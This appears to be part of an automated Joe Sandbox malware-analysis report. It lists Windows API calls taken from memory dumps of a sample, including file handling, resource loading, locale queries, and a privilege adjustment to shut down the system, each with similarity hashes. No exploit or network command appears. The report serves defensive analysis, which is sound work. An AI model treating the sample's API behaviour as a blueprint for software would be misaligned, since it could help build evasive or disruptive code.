                                                                                                                                                                                                                                                                                                                                                                  • Associated: 00000011.00000002.4627408319.0000000000411000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_17_2_400000_1EB9.jbxd
                                                                                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                                                                                  • API ID: ErrorFileLastWrite
                                                                                                                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                                                                                                                  • API String ID: 442123175-0
                                                                                                                                                                                                                                                                                                                                                                  • Opcode ID: 8d2af3ab7a63a8387ab01b8eb17bee2761ee08039256abb6018552f25082062b
                                                                                                                                                                                                                                                                                                                                                                  • Instruction ID: d11fc940c1eb4d9ab9bd5ee1403c634941755763b259216c6d34bff68e3e8731
                                                                                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 8d2af3ab7a63a8387ab01b8eb17bee2761ee08039256abb6018552f25082062b
                                                                                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 6DE0ED766081106BD710A65AD880EAB67DCDFC5764F00407BF904DB291D574AC049676
                                                                                                                                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                                                                                                                  • FormatMessageA.KERNEL32(00003200,00000000,4C783AFB,00000000,?,00000400,00000000,?,00409127,00000000,kernel32.dll,Wow64RevertWow64FsRedirection,00000000,kernel32.dll,Wow64DisableWow64FsRedirection,00000000), ref: 004072A3
                                                                                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                                  • Source File: 00000011.00000002.4627015236.0000000000401000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                                  • Associated: 00000011.00000002.4626719827.0000000000400000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                  • Associated: 00000011.00000002.4627181151.000000000040B000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                  • Associated: 00000011.00000002.4627408319.0000000000411000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_17_2_400000_1EB9.jbxd
                                                                                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                                                                                  • API ID: FormatMessage
                                                                                                                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                                                                                                                  • API String ID: 1306739567-0
                                                                                                                                                                                                                                                                                                                                                                  • Opcode ID: 2dc6ecac2658c0303fbeb732946dba8a31d4bcf901e7642ce2bff6997528785c
                                                                                                                                                                                                                                                                                                                                                                  • Instruction ID: 7b38442d06f496379890204edef453c821f476d6c52b93f329ea0e63e965d40b
                                                                                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 2dc6ecac2658c0303fbeb732946dba8a31d4bcf901e7642ce2bff6997528785c
                                                                                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 17E0D8A0B8830136F22414544C87B77220E47C0700F10807E7700ED3C6D6BEA906815F
                                                                                                                                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                                                                                                                  • SetEndOfFile.KERNEL32(?,01FC8000,0040A08C,00000000), ref: 004076B3
                                                                                                                                                                                                                                                                                                                                                                    • Part of subcall function 0040748C: GetLastError.KERNEL32(0040738C,0040752A,?,?,01FB03AC,?,00409CCE,00000001,00000000,00000002,00000000,0040A2C5,?,00000000,0040A2FC), ref: 0040748F
Memory Dump Source
• Source File: 00000011.00000002.4627015236.0000000000401000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000011.00000002.4626719827.0000000000400000.00000002.00000001.01000000.0000000B.sdmp
• Associated: 00000011.00000002.4627181151.000000000040B000.00000004.00000001.01000000.0000000B.sdmp
• Associated: 00000011.00000002.4627408319.0000000000411000.00000002.00000001.01000000.0000000B.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_17_2_400000_1EB9.jbxd
Similarity
• API ID: ErrorFileLast
• String ID:
• API String ID: 734332943-0
• Opcode ID: 3c9e02bda174eefd6a6752df40b73b0cbe28e66d981a9881f8e50d89b6fd2d40
• Instruction ID: f788b2e916ece263959a2b362e6cc5638f15ca068e5e6b6e193a7bb405067b9b
• Opcode Fuzzy Hash: 3c9e02bda174eefd6a6752df40b73b0cbe28e66d981a9881f8e50d89b6fd2d40
• Instruction Fuzzy Hash: BEC04CA1A1410047CB40A6BE89C1A1666D85A4821530485B6B908DB297D679E8004666
Uniqueness

Uniqueness Score: -1.00%

APIs
• SetErrorMode.KERNEL32(?,00407019), ref: 0040700C
Memory Dump Source
• Source File: 00000011.00000002.4627015236.0000000000401000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000011.00000002.4626719827.0000000000400000.00000002.00000001.01000000.0000000B.sdmp
• Associated: 00000011.00000002.4627181151.000000000040B000.00000004.00000001.01000000.0000000B.sdmp
• Associated: 00000011.00000002.4627408319.0000000000411000.00000002.00000001.01000000.0000000B.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_17_2_400000_1EB9.jbxd
Similarity
• API ID: ErrorMode
• String ID:
• API String ID: 2340568224-0
• Opcode ID: 070e151ae7371931e812c23e1680e2574253ea8634671ff6451d3f815f7c1847
• Instruction ID: c47f2f618e2971e07f5b1abb1c43dc6c143ad8b034d1ddbdae76011a93498253
• Opcode Fuzzy Hash: 070e151ae7371931e812c23e1680e2574253ea8634671ff6451d3f815f7c1847
• Instruction Fuzzy Hash: 54B09B76A1C2415DE705DAD5745153863D4D7C47143A14977F104D35C0D53DA4144519
Uniqueness

Uniqueness Score: -1.00%

APIs
• SetErrorMode.KERNEL32(?,00407019), ref: 0040700C
Memory Dump Source
• Source File: 00000011.00000002.4627015236.0000000000401000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000011.00000002.4626719827.0000000000400000.00000002.00000001.01000000.0000000B.sdmp
• Associated: 00000011.00000002.4627181151.000000000040B000.00000004.00000001.01000000.0000000B.sdmp
• Associated: 00000011.00000002.4627408319.0000000000411000.00000002.00000001.01000000.0000000B.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_17_2_400000_1EB9.jbxd
Similarity
• API ID: ErrorMode
• String ID:
• API String ID: 2340568224-0
• Opcode ID: 258b7047379ce46b8540a294da6ad57472ce1849ceeb23a1b4b516eeda09cad2
• Instruction ID: a55afa0689d716a84ca499c05243e055e04a08b2ab071a0afeb25d409e08decd
• Opcode Fuzzy Hash: 258b7047379ce46b8540a294da6ad57472ce1849ceeb23a1b4b516eeda09cad2
• Instruction Fuzzy Hash: FFA022A8C08000B2CE00E2E08080A3C23283A88308BC08BA2320CB20C0C03CE008020B
Uniqueness

Uniqueness Score: -1.00%

APIs
• CharPrevA.USER32(?,?,0040696C,?,00406649,?,?,00406D87,00000000,00406DAC,?,?,?,?,00000000,00000000), ref: 00406972
Memory Dump Source
• Source File: 00000011.00000002.4627015236.0000000000401000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000011.00000002.4626719827.0000000000400000.00000002.00000001.01000000.0000000B.sdmp
• Associated: 00000011.00000002.4627181151.000000000040B000.00000004.00000001.01000000.0000000B.sdmp
• Associated: 00000011.00000002.4627408319.0000000000411000.00000002.00000001.01000000.0000000B.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_17_2_400000_1EB9.jbxd
Similarity
• API ID: CharPrev
• String ID:
• API String ID: 122130370-0
• Opcode ID: 4f55c7aa95ee0cc6def6f8b84b07f7a00b4eea213dcaa2411b48aa5a82a0c27b
• Instruction ID: 57bb655d476c0b104ac503b4dc16dcc9cc7d9309af7e6782790f501f1b0aeff9
• Opcode Fuzzy Hash: 4f55c7aa95ee0cc6def6f8b84b07f7a00b4eea213dcaa2411b48aa5a82a0c27b
• Instruction Fuzzy Hash:
Uniqueness

Uniqueness Score: -1.00%

APIs
• VirtualAlloc.KERNEL32(00000000,?,00001000,00000004), ref: 00407FA0
Memory Dump Source
• Source File: 00000011.00000002.4627015236.0000000000401000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000011.00000002.4626719827.0000000000400000.00000002.00000001.01000000.0000000B.sdmp
• Associated: 00000011.00000002.4627181151.000000000040B000.00000004.00000001.01000000.0000000B.sdmp
• Associated: 00000011.00000002.4627408319.0000000000411000.00000002.00000001.01000000.0000000B.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_17_2_400000_1EB9.jbxd
Similarity
• API ID: AllocVirtual
• String ID:
• API String ID: 4275171209-0
• Opcode ID: f3d8bc7867bd0b1d1bf8a1a21c6b81e8059d467c94b9dab864cb1ccd8d8ada4e
• Instruction ID: 20a67eb23ea55951ef5110b519d4bcc97d420124264edb02c1094051c82f9398
                                                                                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: f3d8bc7867bd0b1d1bf8a1a21c6b81e8059d467c94b9dab864cb1ccd8d8ada4e
                                                                                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: D2117571A042059BDB00EF19C881B5B7794AF44359F05807EF958AB3C6DB38EC00CBAA
                                                                                                                                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                                                                                                                  • VirtualFree.KERNEL32(?,?,00004000,?,0000000C,?,-00000008,00003FFB,004018BF), ref: 004016B2
                                                                                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                                  • Source File: 00000011.00000002.4627015236.0000000000401000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                                  • Associated: 00000011.00000002.4626719827.0000000000400000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                  • Associated: 00000011.00000002.4627181151.000000000040B000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                  • Associated: 00000011.00000002.4627408319.0000000000411000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_17_2_400000_1EB9.jbxd
                                                                                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                                                                                  • API ID: FreeVirtual
                                                                                                                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                                                                                                                  • API String ID: 1263568516-0
                                                                                                                                                                                                                                                                                                                                                                  • Opcode ID: b4adf7af80dac51c1d798f2a6c61165d01e4b71ea77261fd7569ef2c91f553a4
                                                                                                                                                                                                                                                                                                                                                                  • Instruction ID: 63c8255cdd02620dd55efc6405714c3c0a63becca9b218cdeda95617091702f1
                                                                                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: b4adf7af80dac51c1d798f2a6c61165d01e4b71ea77261fd7569ef2c91f553a4
                                                                                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 3601A7726442148BC310AF28DDC093A77D5EB85364F1A4A7ED985B73A1D23B6C0587A8
                                                                                                                                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                                  • Source File: 00000011.00000002.4627015236.0000000000401000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                                  • Associated: 00000011.00000002.4626719827.0000000000400000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                  • Associated: 00000011.00000002.4627181151.000000000040B000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                  • Associated: 00000011.00000002.4627408319.0000000000411000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_17_2_400000_1EB9.jbxd
                                                                                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                                                                                  • API ID: CloseHandle
                                                                                                                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                                                                                                                  • API String ID: 2962429428-0
                                                                                                                                                                                                                                                                                                                                                                  • Opcode ID: fc6098dcd6b1504a072b68d3feaaa537492281b052079d944a979dec092e75e7
                                                                                                                                                                                                                                                                                                                                                                  • Instruction ID: e7ddd8f09f86228f97b62737e097d00c20d119481f2284b048c56b7aa048eabb
                                                                                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: fc6098dcd6b1504a072b68d3feaaa537492281b052079d944a979dec092e75e7
                                                                                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 41D05E82B00A6017D615F2BE4D8869692D85F89685B08843AF654E77D1D67CEC00838D
                                                                                                                                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                                                                                                                  • VirtualFree.KERNEL32(?,00000000,00008000,?,00407E9D), ref: 00407ECF
                                                                                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                                  • Source File: 00000011.00000002.4627015236.0000000000401000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                                  • Associated: 00000011.00000002.4626719827.0000000000400000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                  • Associated: 00000011.00000002.4627181151.000000000040B000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                  • Associated: 00000011.00000002.4627408319.0000000000411000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_17_2_400000_1EB9.jbxd
                                                                                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                                                                                  • API ID: FreeVirtual
                                                                                                                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                                                                                                                  • API String ID: 1263568516-0
                                                                                                                                                                                                                                                                                                                                                                  • Opcode ID: c7bedad96efb848ea9f674ed311898bb29a23f2a16fc3a9de009753beeeb9dd9
                                                                                                                                                                                                                                                                                                                                                                  • Instruction ID: 622015b425f940adf6dc1d0f89e873b9c6d17cfe6f0c2733970da1323f12c917
                                                                                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: c7bedad96efb848ea9f674ed311898bb29a23f2a16fc3a9de009753beeeb9dd9
                                                                                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 3ED0E9B17553055BDB90EEB98CC1B0237D8BB48610F5044B66904EB296E674E8009654
                                                                                                                                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                                                                                                                  • GetCurrentProcess.KERNEL32(00000028), ref: 00409457
                                                                                                                                                                                                                                                                                                                                                                  • OpenProcessToken.ADVAPI32(00000000,00000028), ref: 0040945D
                                                                                                                                                                                                                                                                                                                                                                  • LookupPrivilegeValueA.ADVAPI32(00000000,SeShutdownPrivilege,00000028), ref: 00409476
                                                                                                                                                                                                                                                                                                                                                                  • AdjustTokenPrivileges.ADVAPI32(?,00000000,00000002,00000000,00000000,00000000), ref: 0040949D
                                                                                                                                                                                                                                                                                                                                                                  • GetLastError.KERNEL32(?,00000000,00000002,00000000,00000000,00000000), ref: 004094A2
                                                                                                                                                                                                                                                                                                                                                                  • ExitWindowsEx.USER32(00000002,00000000), ref: 004094B3
                                                                                                                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                                  • Source File: 00000011.00000002.4627015236.0000000000401000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000011.00000002.4626719827.0000000000400000.00000002.00000001.01000000.0000000B.sdmp
• Associated: 00000011.00000002.4627181151.000000000040B000.00000004.00000001.01000000.0000000B.sdmp
• Associated: 00000011.00000002.4627408319.0000000000411000.00000002.00000001.01000000.0000000B.sdmp
                                                                                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_17_2_400000_1EB9.jbxd
                                                                                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                                                                                  • API ID: ProcessToken$AdjustCurrentErrorExitLastLookupOpenPrivilegePrivilegesValueWindows
                                                                                                                                                                                                                                                                                                                                                                  • String ID: SeShutdownPrivilege
                                                                                                                                                                                                                                                                                                                                                                  • API String ID: 107509674-3733053543
                                                                                                                                                                                                                                                                                                                                                                  • Opcode ID: 5d5c4cc2167cea31fe6e778ad900630fb502c4628614430f67a63468396a48bc
                                                                                                                                                                                                                                                                                                                                                                  • Instruction ID: 55e16e97e4c30333ef6e9d7cb44a764448f3c494fd9ead6bbbdf5d5bb2f9c1eb
                                                                                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 5d5c4cc2167cea31fe6e778ad900630fb502c4628614430f67a63468396a48bc
                                                                                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 61F012B069830179E610AAB18D07F6762885BC4B18F50493ABB15FA1C3D7BDD809466F
                                                                                                                                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                                                                                                                  • FindResourceA.KERNEL32(00000000,00002B67,0000000A), ref: 00409BF6
                                                                                                                                                                                                                                                                                                                                                                  • SizeofResource.KERNEL32(00000000,00000000,?,00409CE6,00000000,0040A27D,?,00000001,00000000,00000002,00000000,0040A2C5,?,00000000,0040A2FC), ref: 00409C09
                                                                                                                                                                                                                                                                                                                                                                  • LoadResource.KERNEL32(00000000,00000000,00000000,00000000,?,00409CE6,00000000,0040A27D,?,00000001,00000000,00000002,00000000,0040A2C5,?,00000000), ref: 00409C1B
                                                                                                                                                                                                                                                                                                                                                                  • LockResource.KERNEL32(00000000,00000000,00000000,00000000,00000000,?,00409CE6,00000000,0040A27D,?,00000001,00000000,00000002,00000000,0040A2C5), ref: 00409C2C
                                                                                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                                  • Source File: 00000011.00000002.4627015236.0000000000401000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000011.00000002.4626719827.0000000000400000.00000002.00000001.01000000.0000000B.sdmp
• Associated: 00000011.00000002.4627181151.000000000040B000.00000004.00000001.01000000.0000000B.sdmp
• Associated: 00000011.00000002.4627408319.0000000000411000.00000002.00000001.01000000.0000000B.sdmp
                                                                                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_17_2_400000_1EB9.jbxd
                                                                                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                                                                                  • API ID: Resource$FindLoadLockSizeof
                                                                                                                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                                                                                                                  • API String ID: 3473537107-0
                                                                                                                                                                                                                                                                                                                                                                  • Opcode ID: ce7c2a79786de0a8682d58b31ceb4174bbddb2d24ae6ad16542ef9ae896a3e40
                                                                                                                                                                                                                                                                                                                                                                  • Instruction ID: ed04ed1443b666af2c347742ca0221af59beed1f1180006ed42e296f861e82c7
                                                                                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: ce7c2a79786de0a8682d58b31ceb4174bbddb2d24ae6ad16542ef9ae896a3e40
                                                                                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: ECE07EA0B483562AFA6076FB08C2B2A018C4BA671DF40003BB701B92C3DEBD8C14856E
                                                                                                                                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                                                                                                                  • GetVersionExA.KERNEL32(?,004065E0,00000000,004065EE,?,?,?,?,?,00409C65), ref: 00405CF2
                                                                                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                                  • Source File: 00000011.00000002.4627015236.0000000000401000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000011.00000002.4626719827.0000000000400000.00000002.00000001.01000000.0000000B.sdmp
• Associated: 00000011.00000002.4627181151.000000000040B000.00000004.00000001.01000000.0000000B.sdmp
• Associated: 00000011.00000002.4627408319.0000000000411000.00000002.00000001.01000000.0000000B.sdmp
                                                                                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_17_2_400000_1EB9.jbxd
                                                                                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                                                                                  • API ID: Version
                                                                                                                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                                                                                                                  • API String ID: 1889659487-0
                                                                                                                                                                                                                                                                                                                                                                  • Opcode ID: c84d22a34f8351a77119842959a44d1d4ba95f00f13a202a1719544d7380acd2
                                                                                                                                                                                                                                                                                                                                                                  • Instruction ID: 3c95a3e10eaf3ff9c271e05f7503c1a51fdcfb4de7972086e3eff1de8b037954
                                                                                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: c84d22a34f8351a77119842959a44d1d4ba95f00f13a202a1719544d7380acd2
                                                                                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: FDC012A040070186D7109B31EC02B1672D4AB44310F440539AEA4953C2E73C80018A5A
                                                                                                                                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                                                                                                                  • GetModuleHandleA.KERNEL32(kernel32.dll,GetUserDefaultUILanguage,00000000,00407129,?,00000000,004098D0), ref: 0040704D
                                                                                                                                                                                                                                                                                                                                                                  • GetProcAddress.KERNEL32(00000000,kernel32.dll), ref: 00407053
                                                                                                                                                                                                                                                                                                                                                                  • RegCloseKey.ADVAPI32(?,?,00000001,00000000,00000000,kernel32.dll,GetUserDefaultUILanguage,00000000,00407129,?,00000000,004098D0), ref: 004070A1
                                                                                                                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                                  • Source File: 00000011.00000002.4627015236.0000000000401000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000011.00000002.4626719827.0000000000400000.00000002.00000001.01000000.0000000B.sdmp
• Associated: 00000011.00000002.4627181151.000000000040B000.00000004.00000001.01000000.0000000B.sdmp
• Associated: 00000011.00000002.4627408319.0000000000411000.00000002.00000001.01000000.0000000B.sdmp
                                                                                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_17_2_400000_1EB9.jbxd
                                                                                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                                                                                  • API ID: AddressCloseHandleModuleProc
                                                                                                                                                                                                                                                                                                                                                                  • String ID: .DEFAULT\Control Panel\International$Control Panel\Desktop\ResourceLocale$GetUserDefaultUILanguage$Locale$kernel32.dll
                                                                                                                                                                                                                                                                                                                                                                  • API String ID: 4190037839-2401316094
                                                                                                                                                                                                                                                                                                                                                                  • Opcode ID: f61943fdfa50da717bbd8070568f426ad52e04842bfe5cc219f36a91d9520f2f
                                                                                                                                                                                                                                                                                                                                                                  • Instruction ID: c068e7fb85b52830e378cef5638f1cf195f9e270113e5aa630163df598a56aa7
                                                                                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: f61943fdfa50da717bbd8070568f426ad52e04842bfe5cc219f36a91d9520f2f
                                                                                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 72214170E04209ABDB10EAB5CC55A9E77A9EB48304F60847BA510FB3C1D7BCAE01875E
                                                                                                                                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                                                                                                                  • CreateFileA.KERNEL32(00000000,80000000,00000002,00000000,00000003,00000080,00000000), ref: 00403B1E
                                                                                                                                                                                                                                                                                                                                                                  • GetFileSize.KERNEL32(?,00000000,00000000,80000000,00000002,00000000,00000003,00000080,00000000), ref: 00403B42
                                                                                                                                                                                                                                                                                                                                                                  • SetFilePointer.KERNEL32(?,-00000080,00000000,00000000,?,00000000,00000000,80000000,00000002,00000000,00000003,00000080,00000000), ref: 00403B5E
                                                                                                                                                                                                                                                                                                                                                                  • ReadFile.KERNEL32(?,?,00000080,?,00000000,00000000,?,-00000080,00000000,00000000,?,00000000,00000000,80000000,00000002,00000000), ref: 00403B7F
                                                                                                                                                                                                                                                                                                                                                                  • SetFilePointer.KERNEL32(?,00000000,00000000,00000002), ref: 00403BA8
                                                                                                                                                                                                                                                                                                                                                                  • SetEndOfFile.KERNEL32(?,?,00000000,00000000,00000002), ref: 00403BB2
                                                                                                                                                                                                                                                                                                                                                                  • GetStdHandle.KERNEL32(000000F5), ref: 00403BD2
                                                                                                                                                                                                                                                                                                                                                                  • GetFileType.KERNEL32(?,000000F5), ref: 00403BE9
                                                                                                                                                                                                                                                                                                                                                                  • CloseHandle.KERNEL32(?,?,000000F5), ref: 00403C04
                                                                                                                                                                                                                                                                                                                                                                  • GetLastError.KERNEL32(000000F5), ref: 00403C1E
                                                                                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                                  • Source File: 00000011.00000002.4627015236.0000000000401000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                                  • Associated: 00000011.00000002.4626719827.0000000000400000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                  • Associated: 00000011.00000002.4627181151.000000000040B000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                  • Associated: 00000011.00000002.4627408319.0000000000411000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_17_2_400000_1EB9.jbxd
                                                                                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                                                                                  • API ID: File$HandlePointer$CloseCreateErrorLastReadSizeType
                                                                                                                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                                                                                                                  • API String ID: 1694776339-0
                                                                                                                                                                                                                                                                                                                                                                  • Opcode ID: bd0a662ad2dd38144def4530256030cdb08cf53568247c3ffcddd32d1ed1ea18
                                                                                                                                                                                                                                                                                                                                                                  • Instruction ID: 6684f6b4d1923fa93cc5777a7ebe0ca766b8c5f16b1f456132d2f0a6dbb27d3d
                                                                                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: bd0a662ad2dd38144def4530256030cdb08cf53568247c3ffcddd32d1ed1ea18
                                                                                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 444194302042009EF7305F258805B237DEDEB4571AF208A3FA1D6BA6E1E77DAE419B5D
                                                                                                                                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                                                                                                                  • GetSystemDefaultLCID.KERNEL32(00000000,004055FC,?,?,?,?,00000000,00000000,00000000,?,004065DB,00000000,004065EE), ref: 004053CE
                                                                                                                                                                                                                                                                                                                                                                    • Part of subcall function 004051FC: GetLocaleInfoA.KERNEL32(?,00000044,?,00000100,0040C4BC,00000001,?,004052C7,?,00000000,004053A6), ref: 0040521A
                                                                                                                                                                                                                                                                                                                                                                    • Part of subcall function 00405248: GetLocaleInfoA.KERNEL32(00000000,0000000F,?,00000002,0000002C,?,?,00000000,0040544A,?,?,?,00000000,004055FC), ref: 0040525B
